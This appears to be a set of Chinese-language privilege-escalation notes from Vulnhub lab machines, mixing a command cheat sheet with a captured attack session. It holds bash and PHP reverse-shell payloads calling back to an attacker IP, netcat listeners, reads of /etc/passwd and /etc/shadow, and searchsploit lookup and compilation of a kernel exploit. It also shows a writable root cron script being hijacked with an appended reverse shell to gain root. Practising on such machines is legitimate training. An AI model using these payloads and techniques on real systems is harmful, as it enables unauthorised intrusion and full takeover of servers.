提权
/bin/bash -i >& /dev/tcp/192.168.37.8/4444 0>&1
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.37.8/4444 0>&1'"); ?>
sudo nc lvnp 4444
whoami
sudo -l
uname -a
dpkg -l (是否有python环境)
python -c "import pty;pty.spawn('/bin/bash')"(存在python环境使用这个命令处理命令行)
cat /etc/passwd
cat /etc/shadow
cat /etc/cron.d
cat /etc/crontab
ls -liah
searchsploit Linux ubuntu 4.10.0-28
searchsploit Linux ubuntu -m 45010.c
gcc 45010.c -o 45010
(使用内核提权的方式是比较暴力的容易导致服务器运行服务的中断)
sudo php -S 0:80(创建本机服务器传文件到目标机器)
www-data@ubuntu:/tmp$ wget http://192.168.37.8/45010.c
chmod +x 45010.c
┌──(kali㉿kali)-[~/Desktop/Vulnhub/w1r3s]
└─$ sudo nc -lvnp 4444
[sudo] password for kali:
listening on [any] 4444 ...
connect to [192.168.37.8] from (UNKNOWN) [192.168.37.13] 36550
bash: no job control in this shell
bash-4.2$ whoami
whoami
jenkins
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ ip a
ip a
bash-4.2$ ifconfig
ifconfig
bash-4.2$ dpkg -l
dpkg -l
bash: dpkg: command not found
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$ mysql
mysql
ERROR 1045 (28000): Access denied for user 'jenkins'@'localhost' (using password: NO)
bash-4.2$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
bash-4.2$ cat /etc/cron.d
cat /etc/cron.d
cat: /etc/cron.d: Is a directory
(crontab是一个自动执行的任务)
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
(使用root反弹连接)
bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.37.8/4443 0>&1">>/etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.37.13/4443 0>&1">>/etc/script/CleaningScript.sh
┌──(kali㉿kali)-[~/Desktop/Vulnhub/jacbas]
└─$ sudo nc -lvnp 4443
[sudo] password for kali:
listening on [any] 4443 ...
connect to [192.168.37.8] from (UNKNOWN) [192.168.37.13] 40238
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:42:0e:d5 brd ff:ff:ff:ff:ff:ff
inet 192.168.37.13/24 brd 192.168.37.255 scope global dynamic ens33
valid_lft 600617sec preferred_lft 600617sec
inet6 fe80::9114:a460:aa3:9dd5/64 scope link
valid_lft forever preferred_lft forever
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!
Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)
Thanks for appreciating this machine.
@tiagotvrs
[root@jarbas ~]#
searchsploit Linux ubuntu 4.10.0-28
--------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: NoResults
使用 find查找有用文件
查询根目录,把报错文件加入/dev/null中,排序,直接显示结果
查看使用有备份文件
find / -name '*backup*' 2>/dev/null | sort |less
find / -writable -type -f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
cd /etc/updata-motd.d/
